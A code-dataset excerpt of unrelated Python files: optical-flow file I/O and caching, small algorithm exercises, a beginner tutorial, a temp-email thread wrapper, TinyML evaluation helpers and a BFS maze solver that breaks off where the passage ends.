data)\n\n\ndef read_flowou1_png(path):\n \"\"\"Read png-compressed flow, occlusions and uncertainty\n\n Args:\n path: \".flowou.png\" file path\n\n Returns:\n flow: (2, H, W) float32 numpy array (delta-x, delta-y)\n occlusions: (1, H, W) float32 array with occlusion scores (1 = occlusion, 0 = visible)\n uncertainty: (1, H, W) float32 array with uncertainty sigma (0 = dirac)\n \"\"\"\n # to specify not to change the image depth (16bit)\n assert Path(path).suffixes == ['.flowou', '.png']\n\n def decode_central(xs, multiplier=32.0):\n return (xs.astype(np.float32) - 2**15) / multiplier\n\n def decode_positive(xs, multiplier=32.0):\n return xs.astype(np.float32) / multiplier\n\n data = cv2.imread(str(path), cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED)\n data = einops.rearrange(data, 'H W C -> C H W', C=4)\n flow, occlusions, uncertainty = data[:2, :, :], data[2, :, :], data[3, :, :]\n occlusions = einops.rearrange(occlusions, 'H W -> 1 H W')\n uncertainty = einops.rearrange(uncertainty, 'H W -> 1 H W')\n flow = decode_central(flow, multiplier=FLOWOU_IO_FLOW_MULTIPLIER)\n occlusions = decode_positive(occlusions, multiplier=FLOWOU_IO_OCCLUSION_MULTIPLIER)\n uncertainty = decode_positive(uncertainty, multiplier=FLOWOU_IO_UNCERTAINTY_MULTIPLIER)\n return flow, occlusions, uncertainty\n\n\ndef write_flowou2_png(path, flow, occlusions, uncertainty):\n \"\"\"Write a compressed png flow, occlusions and uncertainty, with a variable min-max range\n\n Args:\n path: write path (must have \".flowou2.png\" suffix)\n flow: (2, H, W) xy-flow\n occlusions: (1, H, W) array with occlusion scores (1 = occlusion, 0 = visible), clipped between 0 and 1\n uncertainty: (1, H, W) array with uncertainty sigma, clipped between 0 and 2047\n (0 = dirac, max observed on Sintel = 215, Q0.999 on sintel ~ 15)\n \"\"\"\n def encode(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n\n uint16_xs = np.uint16(xs_01 * (2**16 - 1))\n return uint16_xs, lb, ub\n\n assert Path(path).suffixes == ['.flowou2', '.png']\n path.parent.mkdir(parents=True, exist_ok=True)\n einops.parse_shape(flow, 'H W xy')\n flow, flow_min, flow_max = encode(einops.rearrange(flow, 'xy H W -> H W xy', xy=2))\n\n occlusions, occl_min, occl_max = encode(einops.rearrange(occlusions, '1 H W -> H W 1',\n **einops.parse_shape(flow, 'H W _')))\n\n uncertainty, unc_min, unc_max = encode(einops.rearrange(uncertainty, '1 H W -> H W 1',\n **einops.parse_shape(flow, 'H W _')))\n\n data = np.concatenate([flow, occlusions, uncertainty], axis=2)\n pil_data = Image.fromarray(data)\n metadata = PngInfo()\n metadata.add_text(\"flow_min\", str(flow_min))\n metadata.add_text(\"flow_max\", str(flow_max))\n\n metadata.add_text(\"occl_min\", str(occl_min))\n metadata.add_text(\"occl_max\", str(occl_max))\n\n metadata.add_text(\"unc_min\", str(unc_min))\n metadata.add_text(\"unc_max\", str(unc_max))\n pil_data.save(str(path), pnginfo=metadata)\n\n\ndef read_flowou2_png(path):\n \"\"\"Read png-compressed flow, occlusions and uncertainty, with a variable min-max range\n\n Args:\n path: \".flowou2.png\" file path\n\n Returns:\n flow: (2, H, W) float32 numpy array (delta-x, delta-y)\n occlusions: (1, H, W) float32 array with occlusion scores (1 = occlusion, 0 = visible)\n uncertainty: (1, H, W) float32 array with uncertainty sigma (0 = dirac)\n \"\"\"\n # to specify not to change the image depth (16bit)\n assert Path(path).suffixes == ['.flowou2', '.png']\n\n def 
decode(xs, lb, ub):\n xs_01 = np.float32(xs) / (2**16 - 1)\n return lb + xs_01 * (ub - lb)\n\n pil_data = Image.open(str(path))\n metadata = pil_data.text\n data = np.asarray(pil_data)\n data = einops.rearrange(data, 'H W C -> C H W', C=4)\n flow, occlusions, uncertainty = data[:2, :, :], data[2, :, :], data[3, :, :]\n occlusions = einops.rearrange(occlusions, 'H W -> 1 H W')\n uncertainty = einops.rearrange(uncertainty, 'H W -> 1 H W')\n flow = decode(flow, float(metadata['flow_min']), float(metadata['flow_max']))\n occlusions = decode(occlusions, float(metadata['occl_min']), float(metadata['occl_max']))\n uncertainty = decode(uncertainty, float(metadata['unc_min']), float(metadata['unc_max']))\n return flow, occlusions, uncertainty\n\n\ndef write_flowou_X32(path, flow, occlusions, uncertainty):\n def compress_channel(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n uint32_xs = np.uint32(xs_01 * (2**32 - 1))\n return uint32_xs, lb, ub\n\n def u32_to_4u8(xs):\n assert len(xs.shape) == 2, f\"Need a HxW array, got {xs.shape} instead\"\n byte_1 = np.uint8(xs & 0x000000FF)\n byte_2 = np.uint8((xs & 0x0000FF00) >> 8)\n byte_3 = np.uint8((xs & 0x00FF0000) >> 16)\n byte_4 = np.uint8((xs & 0xFF000000) >> 24)\n return np.dstack((byte_4, byte_3, byte_2, byte_1))\n\n def encode_channel(xs):\n compressed_xs, lb, ub = compress_channel(xs)\n xs_4u8 = u32_to_4u8(compressed_xs)\n is_success, buf = cv2.imencode(\".png\", xs_4u8)\n # https://stackoverflow.com/a/52865864/1705970\n return {'data': buf,\n 'min': lb,\n 'max': ub}\n\n result = {\n 'flow_x': encode_channel(flow[0, :, :]),\n 'flow_y': encode_channel(flow[1, :, :]),\n 'occlusion': encode_channel(occlusions[0, :, :]),\n 'sigma': encode_channel(uncertainty[0, :, :])\n }\n\n with open(path, 'wb') as fout:\n pickle.dump(result, fout)\n\n\ndef read_flowou_X32(path):\n def decode_channel(data):\n buf = data['data']\n # https://stackoverflow.com/a/52865864/1705970\n xs_4u8 = cv2.imdecode(buf, cv2.IMREAD_UNCHANGED)\n xs_compressed = data_4u8_to_u32(xs_4u8)\n xs = decompress_channel(xs_compressed, data['min'], data['max'])\n return xs\n\n def data_4u8_to_u32(xs):\n assert xs.dtype == np.uint8\n byte_4, byte_3, byte_2, byte_1 = np.dsplit(np.uint32(xs), 4)\n\n u32 = (byte_4 << 24) | (byte_3 << 16) | (byte_2 << 8) | byte_1\n return einops.rearrange(u32, 'H W 1 -> H W')\n\n def decompress_channel(compressed_xs, lb, ub):\n xs_01 = np.float32(compressed_xs) / (2**32 - 1)\n xs = (xs_01 * (ub - lb)) + lb\n return xs\n\n with open(path, 'rb') as fin:\n data = pickle.load(fin)\n\n flow_x = decode_channel(data['flow_x'])\n flow_y = decode_channel(data['flow_y'])\n flow = np.stack((flow_x, flow_y), axis=0)\n uncertainty = einops.rearrange(decode_channel(data['sigma']), 'H W -> 1 H W')\n occlusions = einops.rearrange(decode_channel(data['occlusion']), 'H W -> 1 H W')\n\n return flow, occlusions, uncertainty\n\n\ndef write_flowou_stepan16(path, flow, occlusions, uncertainty):\n def compress_channel(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n uint16_xs = np.uint16(np.round(xs_01 * (2**16 - 1)))\n return uint16_xs, lb, ub\n\n def u16_to_3u8(xs):\n assert len(xs.shape) == 2, f\"Need a HxW array, got {xs.shape} instead\"\n byte_1 = np.uint8(xs & 0x00FF)\n byte_2 = np.uint8((xs & 0xFF00) >> 8)\n byte_3 = np.uint8((xs & 
0x0000) >> 16)\n return np.dstack((byte_3, byte_2, byte_1))\n\n def encode_channel(xs):\n compressed_xs, lb, ub = compress_channel(xs)\n xs_3u8 = u16_to_3u8(compressed_xs)\n is_success, buf = cv2.imencode(\".png\", xs_3u8)\n return {'data': buf,\n 'min': lb,\n 'max': ub}\n\n result = {\n 'flow_x': encode_channel(flow[0, :, :]),\n 'flow_y': encode_channel(flow[1, :, :]),\n 'occlusion': encode_channel(occlusions[0, :, :]),\n 'sigma': encode_channel(uncertainty[0, :, :])\n }\n\n path = str(path)\n suffix = '.stepan16'\n assert path.endswith(suffix)\n path = path[:-len(suffix)]\n\n flow_x_path = path + '_flow_x.png'\n flow_y_path = path + '_flow_y.png'\n cv2.imwrite(flow_x_path, result['flow_x']['data'])\n cv2.imwrite(flow_y_path, result['flow_y']['data'])\n limits_path = path + '_limits.txt'\n with open(limits_path, 'w') as fout:\n fout.write(f\"{result['flow_x']['min']} {result['flow_x']['max']} {result['flow_y']['min']} {result['flow_y']['max']}\")\n\n\ndef write_flowou_X16(path, flow, occlusions, uncertainty):\n def compress_channel(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n uint16_xs = np.uint16(np.round(xs_01 * (2**16 - 1)))\n return uint16_xs, lb, ub\n\n def u16_to_3u8(xs):\n assert len(xs.shape) == 2, f\"Need a HxW array, got {xs.shape} instead\"\n byte_1 = np.uint8(xs & 0x00FF)\n byte_2 = np.uint8((xs & 0xFF00) >> 8)\n byte_3 = np.uint8((xs & 0x0000) >> 16)\n return np.dstack((byte_3, byte_2, byte_1))\n\n def encode_channel(xs):\n compressed_xs, lb, ub = compress_channel(xs)\n xs_3u8 = u16_to_3u8(compressed_xs)\n is_success, buf = cv2.imencode(\".png\", xs_3u8)\n return {'data': buf,\n 'min': lb,\n 'max': ub}\n\n result = {\n 'flow_x': encode_channel(flow[0, :, :]),\n 'flow_y': encode_channel(flow[1, :, :]),\n 'occlusion': encode_channel(occlusions[0, :, :]),\n 'sigma': encode_channel(uncertainty[0, :, :])\n }\n\n with open(path, 'wb') as fout:\n pickle.dump(result, fout)\n\n\ndef read_flowou_X16(path):\n def decode_channel(data):\n buf = data['data']\n xs_3u8 = cv2.imdecode(buf, cv2.IMREAD_UNCHANGED)\n xs_compressed = data_3u8_to_u16(xs_3u8)\n xs = decompress_channel(xs_compressed, data['min'], data['max'])\n return xs\n\n def data_3u8_to_u16(xs):\n assert xs.dtype == np.uint8\n byte_3, byte_2, byte_1 = np.dsplit(np.uint16(xs), 3)\n\n u16 = (byte_2 << 8) | byte_1\n return einops.rearrange(u16, 'H W 1 -> H W')\n\n def decompress_channel(compressed_xs, lb, ub):\n xs_01 = np.float32(compressed_xs) / (2**16 - 1)\n xs = (xs_01 * (ub - lb)) + lb\n return xs\n\n with open(path, 'rb') as fin:\n data = pickle.load(fin)\n\n flow_x = decode_channel(data['flow_x'])\n flow_y = decode_channel(data['flow_y'])\n flow = np.stack((flow_x, flow_y), axis=0)\n uncertainty = einops.rearrange(decode_channel(data['sigma']), 'H W -> 1 H W')\n occlusions = einops.rearrange(decode_channel(data['occlusion']), 'H W -> 1 H W')\n\n return flow, occlusions, uncertainty\n\n\nclass GeneralVideoCapture(object):\n \"\"\"A cv2.VideoCapture replacement, that can also read images in a directory\"\"\"\n\n def __init__(self, path, reverse=False):\n images = Path(path).is_dir()\n self.image_inputs = images\n if images:\n self.path = path\n self.images = sorted([f for f in next(os.walk(path))[2]\n if os.path.splitext(f)[1].lower() in ['.jpg', '.png', '.jpeg']])\n if reverse:\n self.images = self.images[::-1]\n self.i = 0\n else:\n self.cap = cv2.VideoCapture(str(path))\n\n def read(self):\n if 
self.image_inputs:\n if self.i >= len(self.images):\n return False, None\n img_path = os.path.join(self.path,\n self.images[self.i])\n self.frame_src = self.images[self.i]\n img = cv2.imread(img_path)\n self.i += 1\n return True, img\n else:\n return self.cap.read()\n\n def release(self):\n if self.image_inputs:\n return None\n else:\n return self.cap.release()\n\n\ndef get_video_frames(path):\n cap = GeneralVideoCapture(path)\n while True:\n success, frame = cap.read()\n if not success or frame is None:\n return None\n yield frame\n\n\ndef get_video_length(path):\n N = 0\n for frame in get_video_frames(path):\n N += 1\n return N\n\n\nclass FlowCache():\n def __init__(self, cache_dir, max_RAM_MB=10000, max_GPU_RAM_MB=5000):\n self.cache_dir = cache_dir\n self.max_RAM_MB = max_RAM_MB\n self.max_GPU_RAM_MB = max_GPU_RAM_MB\n self.ram_cache = {}\n self.gpu_ram_cache = {}\n self.bytes_used = 0\n self.gpu_ram_bytes_used = 0\n self.n_saved = 0\n self.cache_dir.mkdir(parents=True, exist_ok=True)\n\n def _put(self, key, value):\n for tensor in value:\n self.bytes_used += sys.getsizeof(tensor.storage())\n self.ram_cache[key] = value\n\n def _put_gpu_ram(self, key, value):\n for tensor in value:\n self.gpu_ram_bytes_used += sys.getsizeof(tensor.storage())\n self.gpu_ram_cache[key] = value\n\n def _get(self, key):\n return self.ram_cache[key]\n\n def _get_gpu_ram(self, key):\n return self.gpu_ram_cache[key]\n\n def ram_space_left(self):\n max_bytes = self.max_RAM_MB * 1000000\n return max(max_bytes - self.bytes_used, 0)\n\n def gpu_ram_space_left(self):\n max_bytes = self.max_GPU_RAM_MB * 1000000\n return max(max_bytes - self.gpu_ram_bytes_used, 0)\n\n # @profile\n def read(self, left_id, right_id):\n key = (left_id, right_id)\n flow_left_to_right, occlusions, sigmas = None, None, None\n if key in self.gpu_ram_cache:\n flow_left_to_right, occlusions, sigmas = self._get_gpu_ram(key)\n elif key in self.ram_cache:\n flow_left_to_right, occlusions, sigmas = self._get(key)\n flow_left_to_right = flow_left_to_right.to('cuda')\n occlusions = occlusions.to('cuda')\n sigmas = sigmas.to('cuda')\n else:\n try:\n cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n assert cache_path.exists()\n flow_left_to_right, occlusions, sigmas = read_flowou(cache_path)\n flow_left_to_right = torch.from_numpy(flow_left_to_right).to('cuda')\n occlusions = torch.from_numpy(occlusions).to('cuda')\n sigmas = torch.from_numpy(sigmas).to('cuda')\n # when reading from disk, try to cache to GPU / RAM\n self.write(left_id, right_id, flow_left_to_right, occlusions, sigmas) \n except Exception:\n pass\n\n return flow_left_to_right, occlusions, sigmas\n\n # @profile\n def write(self, left_id, right_id, flow_left_to_right, occlusions, sigmas):\n if self.gpu_ram_space_left() > 0:\n key = (left_id, right_id)\n self._put_gpu_ram(key, (flow_left_to_right, occlusions, sigmas))\n elif self.ram_space_left() > 0:\n key = (left_id, right_id)\n self._put(key, (flow_left_to_right.cpu(),\n occlusions.cpu(),\n sigmas.cpu()))\n else:\n self.cache_dir.mkdir(parents=True, exist_ok=True)\n cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n if not cache_path.exists():\n write_flowou(cache_path,\n ensure_numpy(flow_left_to_right),\n ensure_numpy(occlusions),\n ensure_numpy(sigmas))\n self.n_saved += 1\n\n def clear(self, clear_disk=True):\n logger.debug(f'Saved {self.n_saved} flows, '\n f'{len(self.gpu_ram_cache)} on GPU ({self.gpu_ram_bytes_used / 2**30:.2f}GiB), '\n f'{len(self.ram_cache)} on RAM ({self.bytes_used / 
2**30:.2f}GiB)')\n        c = Counter()\n        for left_id, right_id in self.ram_cache.keys():\n            delta = abs(left_id - right_id)\n            c[delta] += 1\n        logger.debug(f'delta frequency: {c}')\n\n        self.gpu_ram_cache.clear()\n        self.gpu_ram_bytes_used = 0\n        self.ram_cache.clear()\n        self.bytes_used = 0\n        self.n_saved = 0\n\n        if clear_disk:\n            shutil.rmtree(self.cache_dir, ignore_errors=True)\n\n    def backup_to_disk(self):\n        \"\"\"Save all the cached flowous to disk\"\"\"\n        n_saved = 0\n        for (left_id, right_id), val in tqdm.tqdm(list(self.ram_cache.items()), desc='saving RAM cache'):\n            cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n            if not cache_path.exists():\n                write_flowou(cache_path, *[ensure_numpy(x) for x in val])\n                n_saved += 1\n\n        for (left_id, right_id), val in tqdm.tqdm(list(self.gpu_ram_cache.items()), desc='saving GPU cache'):\n            cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n            if not cache_path.exists():\n                write_flowou(cache_path, *[ensure_numpy(x) for x in val])\n                n_saved += 1\n        logger.info(f\"Saved {n_saved} cached flowous to disk.\")\n\n    def load_from_disk(self):\n        all_cached = sorted(list(self.cache_dir.glob('*.flowouX16.pkl')))\n        n_loaded = 0\n        for path in tqdm.tqdm(all_cached, desc=\"loading flowous from disk\"):\n            left_id, right_id = Path(path.stem).stem.split('--')\n            left_id, right_id = int(left_id), int(right_id)\n\n            try:\n                flow_left_to_right, occlusions, sigmas = read_flowou(path)\n                flow_left_to_right = torch.from_numpy(flow_left_to_right).to('cuda')\n                occlusions = torch.from_numpy(occlusions).to('cuda')\n                sigmas = torch.from_numpy(sigmas).to('cuda')\n                self.write(left_id, right_id, flow_left_to_right, occlusions, sigmas)\n                n_loaded += 1\n            except Exception:\n                pass\n        logger.info(f\"Loaded {n_loaded} flowous into cache.\")\n","repo_name":"serycjon/MFT","sub_path":"MFT/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":27014,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"32326185184","text":"import sys\nsys.stdin = open(\"sample_input.txt\")\n\nT = int(input())\n\nfor tc in range(1, T+1):\n    L = list(input())\n    cnt = 0\n    stick = 0\n    for i in range(len(L)):\n        if L[i] == '(':\n            if L[i+1] == ')':\n                continue  # '()' is a laser; it is counted when its ')' is reached\n            stick += 1  # an iron stick starts here\n        else:\n            if L[i-1] == '(':\n                cnt += stick  # the laser cuts every stick that is currently open\n            else:\n                stick -= 1  # a stick ends: one final piece falls off\n                cnt += 1\n\n    print(tc, cnt)","repo_name":"estar1996/TIL","sub_path":"algo/과목평가 대비/레이저/레이저.py","file_name":"레이저.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7896288511","text":"# this is a simple function that will print what is inside the '' (the string)\nprint('I am Lewis Cleveland')\n\n# this is a print function to print a simple dog\nprint('o----')\nprint(' ||||')\n\n# the below will print a * 10 times\nprint('*' * 10)\n\n# this is an example of a variable, price is the tag, 10 is an integer associated with the tag/variable\nprice = 10\n# I can then change the price to 20, Python will read from top to bottom so will print the last price listed\nprice = 20\nprint(price)\n# this is a float or decimal\nrating = 4.9\n# this is another string\nname = 'Lewis'\n# this is a boolean, they can either be True or False, the capital letters are important\nis_published = True\n\n# task: write variables for a patient called John Smith, he's 20 and is a new patient\nfullname = 'John Smith'\nage = 20\nnew_patient = True\n# this is an input function for the user to answer\nname = input('What is your name? 
')\n# this is an example of concatenation\nprint('Hi ' + name)\n\n# task: ask 2 questions, the person's name and favourite colour, then print the output\nname = input('What is your name? ')\ncolour = input(\"What's your favourite colour? \")\nprint(name + ' likes ' + colour)\n\n# when we want to do maths, you cannot subtract an int from a str; the string needs to be changed to an integer, or int\nbirth_year = input('What is your birth year? ')\nage = 2023 - int(birth_year)\nprint(age)\n# you can check a value's type with the type() function\nprint(type(age))\n\n# challenge: gather a weight input, then convert it into pounds, so using the input, converting into int then times by 2.2\nweight = input('What is your weight in kg? ')\npounds = int(weight) * 2.2\nprint(pounds)\n\n","repo_name":"Arctic22Fox/Homework","sub_path":"Python/mosh.py","file_name":"mosh.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25777143535","text":"#!/usr/bin/python3\n#coding=utf-8\n\n##############################################\n#\n# Author: Shen Wenrui\n# Date: 20180528\n# Description:\n#\n##############################################\n\nimport threading\nimport logging\n\nfrom .tempEmailListener import tempEmailListener\n\nlogger = logging.getLogger(\"tempEmail\")\n\nclass guerrillamailThread(threading.Thread):\n    def __init__(self, threadID, name):\n        threading.Thread.__init__(self)\n        self.threadID = threadID\n        self.name = name\n\n    def run(self):\n        logger.info(\"Starting thread: \" + self.name)\n        logger.info(\"Start the Main process: applying temp email.\")\n\n        guerrillamail = tempEmailListener()\n        guerrillamail.guerrillamailBrowser()\n\n        logger.info(\"Ending thread: \" + self.name)\n        logger.info(\"End the Main process.\")\n","repo_name":"WenruiShen/FreeAppleID","sub_path":"src/TempEmail/tempEmailThread.py","file_name":"tempEmailThread.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"14821846934","text":"import csv, torch, os\nimport numpy as np\n\ndef ACC(mylist):\n    tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n    total = sum(mylist)\n    acc = (tp + tn) / total\n    return acc\n\n\ndef PPV(mylist):\n    tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n    # for the case: there is no VA segs for the patient, then ppv should be 1\n    if tp + fn == 0:\n        ppv = 1\n    # for the case: there is some VA segs, but the predictions are wrong\n    elif tp + fp == 0 and tp + fn != 0:\n        ppv = 0\n    else:\n        ppv = tp / (tp + fp)\n    return ppv\n\n\ndef NPV(mylist):\n    tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n    # for the case: there is no non-VA segs for the patient, then npv should be 1\n    if tn + fp == 0:\n        npv = 1\n    # for the case: there is some VA segs, but the predictions are wrong\n    elif tn + fn == 0 and tn + fp != 0:\n        npv = 0\n    else:\n        npv = tn / (tn + fn)\n    return npv\n\n\ndef Sensitivity(mylist):\n    tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n    # for the case: there is no VA segs for the patient, then sen should be 1\n    if tp + fn == 0:\n        sensitivity = 1\n    else:\n        sensitivity = tp / (tp + fn)\n    return sensitivity\n\n\ndef Specificity(mylist):\n    tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n    # for the case: there is no non-VA segs for the patient, then spe should be 1\n    if tn + fp == 0:\n        specificity = 1\n    else:\n        specificity = tn / (tn + fp)\n    return specificity\n\n\ndef BAC(mylist):\n    sensitivity = Sensitivity(mylist)\n    specificity = Specificity(mylist)\n    b_acc = (sensitivity + specificity) / 2\n    return b_acc\n\n\ndef F1(mylist):\n    precision = PPV(mylist)\n    recall = Sensitivity(mylist)\n    if precision + recall == 0:\n        f1 = 0\n    else:\n        f1 = 2 * (precision * recall) / (precision + recall)\n    return f1\n\n\ndef FB(mylist, beta=2):\n    precision = PPV(mylist)\n    recall = Sensitivity(mylist)\n    if precision + recall == 0:\n        f1 = 0\n    else:\n        f1 = (1+beta**2) * (precision * recall) / ((beta**2)*precision + recall)\n    return f1\n
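\n# Worked example (numbers are illustrative): for mylist = [tp, fn, fp, tn] = [8, 2, 1, 9],\n# SEN = 0.8, SPE = 0.9, BAC = 0.85, ACC = 0.85, PPV = 8/9 ~ 0.889,\n# F1 = 2*(0.889*0.8)/(0.889+0.8) ~ 0.842 and FB (beta=2) ~ 0.816.\n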
\ndef stats_report(mylist):\n    f1 = round(F1(mylist), 5)\n    fb = round(FB(mylist), 5)\n    se = round(Sensitivity(mylist), 5)\n    sp = round(Specificity(mylist), 5)\n    bac = round(BAC(mylist), 5)\n    acc = round(ACC(mylist), 5)\n    ppv = round(PPV(mylist), 5)\n    npv = round(NPV(mylist), 5)\n\n    output = str(mylist) + '\\n' + \\\n             \"F-1 = \" + str(f1) + '\\n' + \\\n             \"F-B = \" + str(fb) + '\\n' + \\\n             \"SEN = \" + str(se) + '\\n' + \\\n             \"SPE = \" + str(sp) + '\\n' + \\\n             \"BAC = \" + str(bac) + '\\n' + \\\n             \"ACC = \" + str(acc) + '\\n' + \\\n             \"PPV = \" + str(ppv) + '\\n' + \\\n             \"NPV = \" + str(npv) + '\\n'\n\n    print(\"F-1 = \", F1(mylist))\n    print(\"F-B = \", FB(mylist))\n    print(\"SEN = \", Sensitivity(mylist))\n    print(\"SPE = \", Specificity(mylist))\n    print(\"BAC = \", BAC(mylist))\n    print(\"ACC = \", ACC(mylist))\n    print(\"PPV = \", PPV(mylist))\n    print(\"NPV = \", NPV(mylist))\n\n    return output\n\ndef loadCSV(csvf):\n    \"\"\"\n    return a dict saving the information of csv\n    :param splitFile: csv file name\n    :return: {label:[file1, file2 ...]}\n    \"\"\"\n    dictLabels = {}\n    with open(csvf) as csvfile:\n        csvreader = csv.reader(csvfile, delimiter=',')\n        next(csvreader, None)  # skip (filename, label)\n        for i, row in enumerate(csvreader):\n            filename = row[0]\n            label = row[1]\n\n            # append filename to current label\n            if label in dictLabels.keys():\n                dictLabels[label].append(filename)\n            else:\n                dictLabels[label] = [filename]\n    return dictLabels\n\n\ndef txt_to_numpy(filename, row):\n    with open(filename) as file:\n        lines = file.readlines()\n    datamat = np.arange(row, dtype=float)\n    row_count = 0\n    for line in lines:\n        line = line.strip().split(' ')\n        datamat[row_count] = line[0]\n        row_count += 1\n\n    return datamat\n\n\nclass ToTensor(object):\n    def __call__(self, sample):\n        text = sample['IEGM_seg']\n        return {\n            'IEGM_seg': torch.from_numpy(text),\n            'label': sample['label']\n        }\n\n\nclass IEGM_DataSET():\n    def __init__(self, root_dir, indice_dir, mode, size, transform=None):\n        self.root_dir = root_dir\n        self.indice_dir = indice_dir\n        self.size = size\n        self.names_list = []\n        self.transform = transform\n\n        csvdata_all = loadCSV(os.path.join(self.indice_dir, mode + '_indice.csv'))\n\n        for i, (k, v) in enumerate(csvdata_all.items()):\n            self.names_list.append(str(k) + ' ' + str(v[0]))\n\n    def __len__(self):\n        return len(self.names_list)\n\n    def __getitem__(self, idx):\n        text_path = self.root_dir + self.names_list[idx].split(' ')[0]\n\n        if not os.path.isfile(text_path):\n            print(text_path + ' does not exist')\n            return None\n\n        IEGM_seg = txt_to_numpy(text_path, self.size).reshape(1, self.size, 1)\n        label = int(self.names_list[idx].split(' ')[1])\n        sample = {'IEGM_seg': IEGM_seg, 'label': label}\n\n        return sample\n\n\ndef pytorch2onnx(net_path, net_name, size):\n    net = torch.load(net_path, map_location=torch.device('cpu'))\n\n    dummy_input = torch.randn(1, 1, size, 1)\n\n    optName = str(net_name)+'.onnx'\n    torch.onnx.export(net, dummy_input, optName, verbose=True)\n
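\n# Example usage (paths and the segment size are illustrative):\n# dataset = IEGM_DataSET(root_dir='./data/', indice_dir='./data/', mode='train',\n#                        size=1250, transform=ToTensor())\n# loader = torch.utils.data.DataLoader(dataset, batch_size=32, shuffle=True)\n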
verbose=True)\n","repo_name":"tinymlcontest/tinymlcontest2022_demo_example","sub_path":"help_code_demo.py","file_name":"help_code_demo.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"9191604307","text":"# 86829674\n\nfrom collections import Counter\nfrom typing import Tuple\n\nNUMBER_OF_ROWS = 4\nNUMBER_OF_PLAYERS = 2\n\n\ndef typing_trainer(k: int, digits: str) -> int:\n cnt = Counter(digits)\n new_cnt = [0 if value > k * NUMBER_OF_PLAYERS else 1 for value in cnt.values()]\n return sum(new_cnt)\n\n\ndef read_input() -> Tuple[int, str]:\n digits = []\n k = int(input())\n for i in range(4):\n digits.append(input())\n digits = \"\".join(digits)\n digits = \"\".join(c for c in digits if c.isdecimal())\n return (k, digits)\n\n\nif __name__ == '__main__':\n k, digits = read_input()\n result = typing_trainer(k, digits)\n print(result)\n","repo_name":"lerapraga/algorithms_11_sprint","sub_path":"typing_trainer.py","file_name":"typing_trainer.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30118981077","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom dm.core.objects.status import DMStatus\nfrom utilities import *\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.objects.unit import DMUnit\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"Taunt\",)\n\n################################################################################\nclass Taunt(DMStatus):\n\n def __init__(\n self,\n game: DMGame,\n parent: Optional[DMUnit] = None,\n stacks: Optional[int] = 1\n ):\n\n super().__init__(\n game,\n parent,\n _id=\"BUF-129\",\n name=\"Taunt\",\n description=\"Become all enemies' target.\",\n stacks=stacks,\n status_type=StatusType.Buff\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n \"\"\"Called in every iteration of the battle loop.\"\"\"\n\n if self.owner.room == ctx.room:\n # Force change the defending unit to the owner of this status.\n if self.owner != ctx.target:\n ctx.reassign_defender(self.owner)\n\n # Register callback to reduce stacks if damage is actually done\n ctx.register_post_execute(self.notify)\n\n################################################################################\n def notify(self, ctx: AttackContext) -> None:\n\n if self.owner == ctx.target:\n if ctx.damage > 0:\n self.reduce_stacks_by_one()\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/statuses/buffs/Taunt.py","file_name":"Taunt.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37407839968","text":"from collections import deque\n\nn, m = map(int, input().split())\narr = []\n\nfor i in range(n):\n arr.append(list(map(int, input())))\n\n# 상하좌우\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n\ndef bfs(x, y):\n queue = deque()\n # 큐에 좌표값 할당\n queue.append((x, y))\n\n # 큐가 빌 때까지\n while queue:\n # 큐의 맨 아래에 있는 요소 꺼내기\n x, y = queue.popleft()\n\n # 상하좌우 탐색\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n # 미로를 벗어났을 경우\n if nx < 0 or ny < 0 or nx >= n or ny >= m:\n 
